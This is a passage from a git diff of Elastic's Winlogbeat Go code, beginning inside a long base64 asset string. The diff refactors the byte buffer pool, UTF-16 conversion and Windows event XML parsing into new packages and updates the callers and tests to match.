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" } diff --git a/winlogbeat/sys/buffer.go b/winlogbeat/sys/buffer.go index 97299a20913..d7721b5adc5 100644 --- a/winlogbeat/sys/buffer.go +++ b/winlogbeat/sys/buffer.go @@ -61,3 +61,24 @@ func (b *ByteBuffer) Bytes() []byte { func (b *ByteBuffer) Len() int { return b.offset } + +// PtrAt returns a pointer to the given offset of the buffer. +func (b *ByteBuffer) PtrAt(offset int) *byte { + if offset > b.offset-1 { + return nil + } + return &b.buf[offset] +} + +// Reserve reserves n bytes by increasing the buffer's length. It may allocate +// a new underlying buffer discarding any existing contents. +func (b *ByteBuffer) Reserve(n int) { + b.offset = n + + if n > cap(b.buf) { + // Allocate new larger buffer with len=n. + b.buf = make([]byte, n) + } else { + b.buf = b.buf[:n] + } +} diff --git a/winlogbeat/sys/bufferpool.go b/winlogbeat/sys/bufferpool.go new file mode 100644 index 00000000000..ed5bbebfbc6 --- /dev/null +++ b/winlogbeat/sys/bufferpool.go @@ -0,0 +1,48 @@ +// Licensed to Elasticsearch B.V. under one or more contributor +// license agreements. See the NOTICE file distributed with +// this work for additional information regarding copyright +// ownership. Elasticsearch B.V. licenses this file to you under +// the Apache License, Version 2.0 (the "License"); you may +// not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package sys + +import ( + "sync" +) + +// bufferPool contains a pool of PooledByteBuffer objects. +var bufferPool = sync.Pool{ + New: func() interface{} { return &PooledByteBuffer{ByteBuffer: NewByteBuffer(1024)} }, +} + +// PooledByteBuffer is an expandable buffer backed by a byte slice. +type PooledByteBuffer struct { + *ByteBuffer +} + +// NewPooledByteBuffer return a PooledByteBuffer from the pool. The returned value must +// be released with Free(). +func NewPooledByteBuffer() *PooledByteBuffer { + b := bufferPool.Get().(*PooledByteBuffer) + b.Reset() + return b +} + +// Free returns the PooledByteBuffer to the pool. +func (b *PooledByteBuffer) Free() { + if b == nil { + return + } + bufferPool.Put(b) +} diff --git a/winlogbeat/sys/strings.go b/winlogbeat/sys/strings.go index 12d91fac31d..d542277f17b 100644 --- a/winlogbeat/sys/strings.go +++ b/winlogbeat/sys/strings.go @@ -18,57 +18,23 @@ package sys import ( - "errors" - "fmt" "strings" - "unicode/utf16" -) - -var ErrBufferTooSmall = errors.New("buffer too small") - -// UTF16BytesToString returns a string that is decoded from the UTF-16 bytes. -// The byte slice must be of even length otherwise an error will be returned. -// The integer returned is the offset to the start of the next string with -// buffer if it exists, otherwise -1 is returned. -func UTF16BytesToString(b []byte) (string, int, error) { - if len(b)%2 != 0 { - return "", 0, fmt.Errorf("Slice must have an even length (length=%d)", len(b)) - } - offset := -1 - - // Find the null terminator if it exists and re-slice the b. - if nullIndex := indexNullTerminator(b); nullIndex > -1 { - if len(b) > nullIndex+2 { - offset = nullIndex + 2 - } - - b = b[:nullIndex] - } - - s := make([]uint16, len(b)/2) - for i := range s { - s[i] = uint16(b[i*2]) + uint16(b[(i*2)+1])<<8 - } - - return string(utf16.Decode(s)), offset, nil -} + "github.com/elastic/beats/v7/libbeat/common" +) -// indexNullTerminator returns the index of a null terminator within a buffer -// containing UTF-16 encoded data. If the null terminator is not found -1 is -// returned. -func indexNullTerminator(b []byte) int { - if len(b) < 2 { - return -1 - } +// UTF16BytesToString converts the given UTF-16 bytes to a string. +func UTF16BytesToString(b []byte) (string, error) { + // Use space from the ByteBuffer pool as working memory for the conversion. + bb := NewPooledByteBuffer() + defer bb.Free() - for i := 0; i < len(b); i += 2 { - if b[i] == 0 && b[i+1] == 0 { - return i - } + if err := common.UTF16ToUTF8Bytes(b, bb); err != nil { + return "", err } - return -1 + // This copies the UTF-8 bytes to create a string. + return string(bb.Bytes()), nil } // RemoveWindowsLineEndings replaces carriage return line feed (CRLF) with diff --git a/winlogbeat/sys/strings_test.go b/winlogbeat/sys/strings_test.go index 358e61ed6b2..0771b7b3cff 100644 --- a/winlogbeat/sys/strings_test.go +++ b/winlogbeat/sys/strings_test.go @@ -18,7 +18,6 @@ package sys import ( - "bytes" "testing" "github.com/stretchr/testify/assert" @@ -30,59 +29,13 @@ func TestUTF16BytesToString(t *testing.T) { input := "abc白鵬翔\u145A6" utf16Bytes := common.StringToUTF16Bytes(input) - output, _, err := UTF16BytesToString(utf16Bytes) + output, err := UTF16BytesToString(utf16Bytes) if err != nil { t.Fatal(err) } assert.Equal(t, input, output) } -func TestUTF16BytesToStringOffset(t *testing.T) { - in := bytes.Join([][]byte{common.StringToUTF16Bytes("one"), common.StringToUTF16Bytes("two"), common.StringToUTF16Bytes("three")}, []byte{0, 0}) - - output, offset, err := UTF16BytesToString(in) - if err != nil { - t.Fatal(err) - } - assert.Equal(t, "one", output) - assert.Equal(t, 8, offset) - - in = in[offset:] - output, offset, err = UTF16BytesToString(in) - if err != nil { - t.Fatal(err) - } - assert.Equal(t, "two", output) - assert.Equal(t, 8, offset) - - in = in[offset:] - output, offset, err = UTF16BytesToString(in) - if err != nil { - t.Fatal(err) - } - assert.Equal(t, "three", output) - assert.Equal(t, -1, offset) -} - -func TestUTF16BytesToStringOffsetWithEmptyString(t *testing.T) { - in := bytes.Join([][]byte{common.StringToUTF16Bytes(""), common.StringToUTF16Bytes("two")}, []byte{0, 0}) - - output, offset, err := UTF16BytesToString(in) - if err != nil { - t.Fatal(err) - } - assert.Equal(t, "", output) - assert.Equal(t, 2, offset) - - in = in[offset:] - output, offset, err = UTF16BytesToString(in) - if err != nil { - t.Fatal(err) - } - assert.Equal(t, "two", output) - assert.Equal(t, -1, offset) -} - func BenchmarkUTF16BytesToString(b *testing.B) { utf16Bytes := common.StringToUTF16Bytes("A logon was attempted using explicit credentials.") diff --git a/winlogbeat/sys/event.go b/winlogbeat/sys/winevent/event.go similarity index 71% rename from winlogbeat/sys/event.go rename to winlogbeat/sys/winevent/event.go index b6674d41f40..53c6b49abd5 100644 --- a/winlogbeat/sys/event.go +++ b/winlogbeat/sys/winevent/event.go @@ -15,19 +15,41 @@ // specific language governing permissions and limitations // under the License. -package sys +package winevent import ( "encoding/xml" "fmt" "strconv" + "strings" "time" + + "github.com/elastic/beats/v7/libbeat/common" + libxml "github.com/elastic/beats/v7/libbeat/common/encoding/xml" + "github.com/elastic/beats/v7/libbeat/logp" + "github.com/elastic/beats/v7/winlogbeat/sys" +) + +// Debug selectors used in this package. +const ( + debugSelector = "winevent" +) + +// Debug logging functions for this package. +var ( + debugf = logp.MakeDebug(debugSelector) ) -// UnmarshalEventXML unmarshals the given XML into a new Event. -func UnmarshalEventXML(rawXML []byte) (Event, error) { +// Keyword Constants +const ( + keywordAuditFailure = 0x10000000000000 + keywordAuditSuccess = 0x20000000000000 +) + +// UnmarshalXML unmarshals the given XML into a new Event. +func UnmarshalXML(rawXML []byte) (Event, error) { var event Event - decoder := xml.NewDecoder(newXMLSafeReader(rawXML)) + decoder := xml.NewDecoder(libxml.NewSafeReader(rawXML)) err := decoder.Decode(&event) return event, err } @@ -66,6 +88,70 @@ type Event struct { RenderErr []string } +func (e Event) Fields() common.MapStr { + // Windows Log Specific data + win := common.MapStr{} + + AddOptional(win, "channel", e.Channel) + AddOptional(win, "event_id", e.EventIdentifier.ID) + AddOptional(win, "provider_name", e.Provider.Name) + AddOptional(win, "record_id", e.RecordID) + AddOptional(win, "task", e.Task) + AddOptional(win, "computer_name", e.Computer) + AddOptional(win, "keywords", e.Keywords) + AddOptional(win, "opcode", e.Opcode) + AddOptional(win, "provider_guid", e.Provider.GUID) + AddOptional(win, "task", e.Task) + AddOptional(win, "version", e.Version) + AddOptional(win, "time_created", e.TimeCreated.SystemTime) + + if e.KeywordsRaw&keywordAuditFailure > 0 { + _, _ = win.Put("outcome", "failure") + } else if e.KeywordsRaw&keywordAuditSuccess > 0 { + _, _ = win.Put("outcome", "success") + } + + AddOptional(win, "level", strings.ToLower(e.Level)) + AddOptional(win, "message", sys.RemoveWindowsLineEndings(e.Message)) + + if e.User.Identifier != "" { + user := common.MapStr{ + "identifier": e.User.Identifier, + } + win["user"] = user + AddOptional(user, "domain", e.User.Domain) + AddOptional(user, "name", e.User.Name) + AddOptional(user, "type", e.User.Type.String()) + } + + AddPairs(win, "event_data", e.EventData.Pairs) + userData := AddPairs(win, "user_data", e.UserData.Pairs) + AddOptional(userData, "xml_name", e.UserData.Name.Local) + + // Correlation + AddOptional(win, "activity_id", e.Correlation.ActivityID) + AddOptional(win, "related_activity_id", e.Correlation.RelatedActivityID) + + // Execution + AddOptional(win, "kernel_time", e.Execution.KernelTime) + AddOptional(win, "process.pid", e.Execution.ProcessID) + AddOptional(win, "process.thread.id", e.Execution.ThreadID) + AddOptional(win, "processor_id", e.Execution.ProcessorID) + AddOptional(win, "processor_time", e.Execution.ProcessorTime) + AddOptional(win, "session_id", e.Execution.SessionID) + AddOptional(win, "user_time", e.Execution.UserTime) + + // Errors + AddOptional(win, "error.code", e.RenderErrorCode) + if len(e.RenderErr) == 1 { + AddOptional(win, "error.message", e.RenderErr[0]) + } else { + AddOptional(win, "error.message", e.RenderErr) + } + + return win +} + // Provider identifies the provider that logged the event. The Name and GUID // attributes are included if the provider used an instrumentation manifest to // define its events; otherwise, the EventSourceName attribute is included if a diff --git a/winlogbeat/sys/event_test.go b/winlogbeat/sys/winevent/event_test.go similarity index 97% rename from winlogbeat/sys/event_test.go rename to winlogbeat/sys/winevent/event_test.go index d4a4d2a564d..4ed391b91be 100644 --- a/winlogbeat/sys/event_test.go +++ b/winlogbeat/sys/winevent/event_test.go @@ -15,7 +15,7 @@ // specific language governing permissions and limitations // under the License. -package sys +package winevent import ( "encoding/json" @@ -154,7 +154,7 @@ func TestXML(t *testing.T) { } for _, test := range tests { - event, err := UnmarshalEventXML([]byte(test.xml)) + event, err := UnmarshalXML([]byte(test.xml)) if err != nil { t.Error(err) continue @@ -175,7 +175,7 @@ func TestXML(t *testing.T) { // when the event is decoded. func TestInvalidXML(t *testing.T) { evXML := strings.Replace(allXML, "%1", "\t \n\x1b", -1) - ev, err := UnmarshalEventXML([]byte(evXML)) + ev, err := UnmarshalXML([]byte(evXML)) assert.Equal(t, nil, err) assert.Equal(t, "Creating WSMan shell on server with ResourceUri: \t\r\n\\u001b", ev.Message) } @@ -236,14 +236,14 @@ const nonUnsignedIntVersion = ` // // Reference: https://docs.microsoft.com/en-us/windows/win32/wes/schema-version-systempropertiestype-element func TestInvalidVersion(t *testing.T) { - ev, err := UnmarshalEventXML([]byte(nonUnsignedIntVersion)) + ev, err := UnmarshalXML([]byte(nonUnsignedIntVersion)) assert.NoError(t, err) assert.EqualValues(t, 0, ev.Version) } func BenchmarkXMLUnmarshal(b *testing.B) { for i := 0; i < b.N; i++ { - _, err := UnmarshalEventXML([]byte(allXML)) + _, err := UnmarshalXML([]byte(allXML)) if err != nil { b.Fatal(err) } diff --git a/winlogbeat/sys/winevent/maputil.go b/winlogbeat/sys/winevent/maputil.go new file mode 100644 index 00000000000..41fe694c88e --- /dev/null +++ b/winlogbeat/sys/winevent/maputil.go @@ -0,0 +1,99 @@ +// Licensed to Elasticsearch B.V. under one or more contributor +// license agreements. See the NOTICE file distributed with +// this work for additional information regarding copyright +// ownership. Elasticsearch B.V. licenses this file to you under +// the Apache License, Version 2.0 (the "License"); you may +// not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package winevent + +import ( + "fmt" + "reflect" + + "github.com/elastic/beats/v7/libbeat/common" + "github.com/elastic/beats/v7/winlogbeat/sys" +) + +// AddOptional adds a key and value to the given MapStr if the value is not the +// zero value for the type of v. It is safe to call the function with a nil +// MapStr. +func AddOptional(m common.MapStr, key string, v interface{}) { + if m != nil && !isZero(v) { + _, _ = m.Put(key, v) + } +} + +// AddPairs adds a new dictionary to the given MapStr. The key/value pairs are +// added to the new dictionary. If any keys are duplicates, the first key/value +// pair is added and the remaining duplicates are dropped. +// +// The new dictionary is added to the given MapStr and it is also returned for +// convenience purposes. +func AddPairs(m common.MapStr, key string, pairs []KeyValue) common.MapStr { + if len(pairs) == 0 { + return nil + } + + h := make(common.MapStr, len(pairs)) + for i, kv := range pairs { + // Ignore empty values. + if kv.Value == "" { + continue + } + + // If the key name is empty or if it the default of "Data" then + // assign a generic name of paramN. + k := kv.Key + if k == "" || k == "Data" { + k = fmt.Sprintf("param%d", i+1) + } + + // Do not overwrite. + _, err := h.GetValue(k) + if err == common.ErrKeyNotFound { + _, _ = h.Put(k, sys.RemoveWindowsLineEndings(kv.Value)) + } else { + debugf("Dropping key/value (k=%s, v=%s) pair because key already "+ + "exists. event=%+v", k, kv.Value, m) + } + } + + if len(h) == 0 { + return nil + } + + _, _ = m.Put(key, h) + + return h +} + +// isZero return true if the given value is the zero value for its type. +func isZero(i interface{}) bool { + v := reflect.ValueOf(i) + switch v.Kind() { + case reflect.Array, reflect.String: + return v.Len() == 0 + case reflect.Bool: + return !v.Bool() + case reflect.Int, reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64: + return v.Int() == 0 + case reflect.Uint, reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uintptr: + return v.Uint() == 0 + case reflect.Float32, reflect.Float64: + return v.Float() == 0 + case reflect.Interface, reflect.Map, reflect.Ptr, reflect.Slice: + return v.IsNil() + } + return false +} diff --git a/winlogbeat/sys/sid.go b/winlogbeat/sys/winevent/sid.go similarity index 99% rename from winlogbeat/sys/sid.go rename to winlogbeat/sys/winevent/sid.go index 1f09c1b8f8f..9c162f189e5 100644 --- a/winlogbeat/sys/sid.go +++ b/winlogbeat/sys/winevent/sid.go @@ -15,7 +15,7 @@ // specific language governing permissions and limitations // under the License. -package sys +package winevent import ( "fmt" diff --git a/winlogbeat/sys/sid_test.go b/winlogbeat/sys/winevent/sid_test.go similarity index 98% rename from winlogbeat/sys/sid_test.go rename to winlogbeat/sys/winevent/sid_test.go index ec984f1b05f..aced1a3921a 100644 --- a/winlogbeat/sys/sid_test.go +++ b/winlogbeat/sys/winevent/sid_test.go @@ -17,7 +17,7 @@ // +build !integration -package sys +package winevent import ( "testing" diff --git a/winlogbeat/sys/sid_windows.go b/winlogbeat/sys/winevent/sid_windows.go similarity index 98% rename from winlogbeat/sys/sid_windows.go rename to winlogbeat/sys/winevent/sid_windows.go index 23fb3f04879..001782556fa 100644 --- a/winlogbeat/sys/sid_windows.go +++ b/winlogbeat/sys/winevent/sid_windows.go @@ -15,7 +15,7 @@ // specific language governing permissions and limitations // under the License. -package sys +package winevent import "golang.org/x/sys/windows" diff --git a/winlogbeat/sys/wineventlog/bookmark.go b/winlogbeat/sys/wineventlog/bookmark.go index fa806aa2c34..db9d3d14452 100644 --- a/winlogbeat/sys/wineventlog/bookmark.go +++ b/winlogbeat/sys/wineventlog/bookmark.go @@ -24,6 +24,8 @@ import ( "github.com/pkg/errors" "golang.org/x/sys/windows" + + "github.com/elastic/beats/v7/winlogbeat/sys" ) // Bookmark is a handle to an event log bookmark. @@ -43,16 +45,16 @@ func (b Bookmark) XML() (string, error) { return "", errors.Wrap(err, "failed to determine necessary buffer size for EvtRender") } - bb := newByteBuffer() + bb := sys.NewPooledByteBuffer() bb.Reserve(int(bufferUsed * 2)) - defer bb.free() + defer bb.Free() - err = _EvtRender(NilHandle, EvtHandle(b), EvtRenderBookmark, uint32(len(bb.buf)), &bb.buf[0], &bufferUsed, nil) + err = _EvtRender(NilHandle, EvtHandle(b), EvtRenderBookmark, uint32(bb.Len()), bb.PtrAt(0), &bufferUsed, nil) if err != nil { return "", errors.Wrap(err, "failed to render bookmark XML") } - return UTF16BytesToString(bb.buf) + return sys.UTF16BytesToString(bb.Bytes()) } // NewBookmarkFromEvent returns a Bookmark pointing to the given event record. diff --git a/winlogbeat/sys/wineventlog/bufferpool.go b/winlogbeat/sys/wineventlog/bufferpool.go deleted file mode 100644 index 90bdf825de1..00000000000 --- a/winlogbeat/sys/wineventlog/bufferpool.go +++ /dev/null @@ -1,113 +0,0 @@ -// Licensed to Elasticsearch B.V. under one or more contributor -// license agreements. See the NOTICE file distributed with -// this work for additional information regarding copyright -// ownership. Elasticsearch B.V. licenses this file to you under -// the Apache License, Version 2.0 (the "License"); you may -// not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package wineventlog - -import ( - "sync" - - "github.com/elastic/beats/v7/libbeat/common" -) - -// bufferPool contains a pool of byteBuffer objects. -var bufferPool = sync.Pool{ - New: func() interface{} { return &byteBuffer{buf: make([]byte, 1024)} }, -} - -// byteBuffer is an expandable buffer backed by a byte slice. -type byteBuffer struct { - buf []byte - offset int -} - -// newByteBuffer return a byteBuffer from the pool. The returned value must -// be released with free(). -func newByteBuffer() *byteBuffer { - b := bufferPool.Get().(*byteBuffer) - b.Reset() - return b -} - -// free returns the byteBuffer to the pool. -func (b *byteBuffer) free() { - if b == nil { - return - } - bufferPool.Put(b) -} - -// Write appends the contents of p to the buffer, growing the buffer as needed. -// The return value is the length of p; err is always nil. This implements -// io.Writer. -func (b *byteBuffer) Write(p []byte) (int, error) { - if len(b.buf) < b.offset+len(p) { - // Create a buffer larger than needed so we don't spend lots of time - // allocating and copying. - spaceNeeded := len(b.buf) - b.offset + len(p) - largerBuf := make([]byte, 2*len(b.buf)+spaceNeeded) - copy(largerBuf, b.buf[:b.offset]) - b.buf = largerBuf - } - n := copy(b.buf[b.offset:], p) - b.offset += n - return n, nil -} - -// Reset resets the buffer to be empty. It retains the same underlying storage -// capacity. -func (b *byteBuffer) Reset() { - b.offset = 0 - b.buf = b.buf[:cap(b.buf)] -} - -// Bytes returns a slice of length b.Len() holding the bytes that have been -// written to the buffer. -func (b *byteBuffer) Bytes() []byte { - return b.buf[:b.offset] -} - -// Len returns the number of bytes that have been written to the buffer. -func (b *byteBuffer) Len() int { - return b.offset -} - -// Reserve reserves n bytes by increasing the buffer's length. It may allocate -// a new underlying buffer discarding any existing contents. -func (b *byteBuffer) Reserve(n int) { - b.offset = n - - if n > cap(b.buf) { - // Allocate new larger buffer with len=n. - b.buf = make([]byte, n) - } else { - b.buf = b.buf[:n] - } -} - -// UTF16BytesToString converts the given UTF-16 bytes to a string. -func UTF16BytesToString(b []byte) (string, error) { - // Use space from the byteBuffer pool as working memory for the conversion. - bb := newByteBuffer() - defer bb.free() - - if err := common.UTF16ToUTF8Bytes(b, bb); err != nil { - return "", err - } - - // This copies the UTF-8 bytes to create a string. - return string(bb.Bytes()), nil -} diff --git a/winlogbeat/sys/wineventlog/format_message.go b/winlogbeat/sys/wineventlog/format_message.go index e8befcdeae3..29182d6f6a0 100644 --- a/winlogbeat/sys/wineventlog/format_message.go +++ b/winlogbeat/sys/wineventlog/format_message.go @@ -24,6 +24,8 @@ import ( "github.com/pkg/errors" "golang.org/x/sys/windows" + + "github.com/elastic/beats/v7/winlogbeat/sys" ) // getMessageStringFromHandle returns the message for the given eventHandle. @@ -82,11 +84,11 @@ func evtFormatMessage(metadataHandle EvtHandle, eventHandle EvtHandle, messageID } // Get a buffer from the pool and adjust its length. - bb := newByteBuffer() - defer bb.free() + bb := sys.NewPooledByteBuffer() + defer bb.Free() bb.Reserve(int(bufferUsed * 2)) - err = _EvtFormatMessage(metadataHandle, eventHandle, messageID, valuesCount, valuesPtr, messageFlag, uint32(len(bb.buf)/2), &bb.buf[0], &bufferUsed) + err = _EvtFormatMessage(metadataHandle, eventHandle, messageID, valuesCount, valuesPtr, messageFlag, uint32(bb.Len()/2), bb.PtrAt(0), &bufferUsed) if err != nil { switch err { // Ignore some errors so it can tolerate missing or mismatched parameter values. @@ -98,5 +100,5 @@ func evtFormatMessage(metadataHandle EvtHandle, eventHandle EvtHandle, messageID } } - return UTF16BytesToString(bb.buf) + return sys.UTF16BytesToString(bb.Bytes()) } diff --git a/winlogbeat/sys/wineventlog/metadata_store.go b/winlogbeat/sys/wineventlog/metadata_store.go index e59294f6276..fe94c03e168 100644 --- a/winlogbeat/sys/wineventlog/metadata_store.go +++ b/winlogbeat/sys/wineventlog/metadata_store.go @@ -30,6 +30,7 @@ import ( "github.com/elastic/beats/v7/libbeat/logp" "github.com/elastic/beats/v7/winlogbeat/sys" + "github.com/elastic/beats/v7/winlogbeat/sys/winevent" ) var ( @@ -295,7 +296,7 @@ func newEventMetadataFromEventHandle(publisher *PublisherMetadata, eventHandle E // By parsing the XML we can get the names of the parameters even if the // publisher metadata is unavailable or is out of sync with the events. - event, err := sys.UnmarshalEventXML([]byte(xml)) + event, err := winevent.UnmarshalXML([]byte(xml)) if err != nil { return nil, errors.Wrap(err, "failed to unmarshal XML") } diff --git a/winlogbeat/sys/wineventlog/renderer.go b/winlogbeat/sys/wineventlog/renderer.go index 4a6fcc2fef1..d52f4399fa2 100644 --- a/winlogbeat/sys/wineventlog/renderer.go +++ b/winlogbeat/sys/wineventlog/renderer.go @@ -35,6 +35,7 @@ import ( "github.com/elastic/beats/v7/libbeat/logp" "github.com/elastic/beats/v7/winlogbeat/sys" + "github.com/elastic/beats/v7/winlogbeat/sys/winevent" ) const ( @@ -93,8 +94,8 @@ func (r *Renderer) Close() error { } // Render renders the event handle into an Event. -func (r *Renderer) Render(handle EvtHandle) (*sys.Event, error) { - event := &sys.Event{} +func (r *Renderer) Render(handle EvtHandle) (*winevent.Event, error) { + event := &winevent.Event{} if err := r.renderSystem(handle, event); err != nil { return nil, errors.Wrap(err, "failed to render system properties") @@ -175,19 +176,19 @@ func (r *Renderer) getPublisherMetadata(publisher string) (*publisherMetadataSto } // renderSystem writes all the system context properties into the event. -func (r *Renderer) renderSystem(handle EvtHandle, event *sys.Event) error { +func (r *Renderer) renderSystem(handle EvtHandle, event *winevent.Event) error { bb, propertyCount, err := r.render(r.systemContext, handle) if err != nil { return errors.Wrap(err, "failed to get system values") } - defer bb.free() + defer bb.Free() for i := 0; i < int(propertyCount); i++ { property := EvtSystemPropertyID(i) offset := i * int(sizeofEvtVariant) - evtVar := (*EvtVariant)(unsafe.Pointer(&bb.buf[offset])) + evtVar := (*EvtVariant)(unsafe.Pointer(bb.PtrAt(offset))) - data, err := evtVar.Data(bb.buf) + data, err := evtVar.Data(bb.Bytes()) if err != nil || data == nil { continue } @@ -208,7 +209,7 @@ func (r *Renderer) renderSystem(handle EvtHandle, event *sys.Event) error { case EvtSystemOpcode: event.OpcodeRaw = data.(uint8) case EvtSystemKeywords: - event.KeywordsRaw = sys.HexInt64(data.(hexInt64)) + event.KeywordsRaw = winevent.HexInt64(data.(hexInt64)) case EvtSystemTimeCreated: event.TimeCreated.SystemTime = data.(time.Time) case EvtSystemEventRecordId: @@ -230,9 +231,9 @@ func (r *Renderer) renderSystem(handle EvtHandle, event *sys.Event) error { event.User.Identifier = sid.String() var accountType uint32 event.User.Name, event.User.Domain, 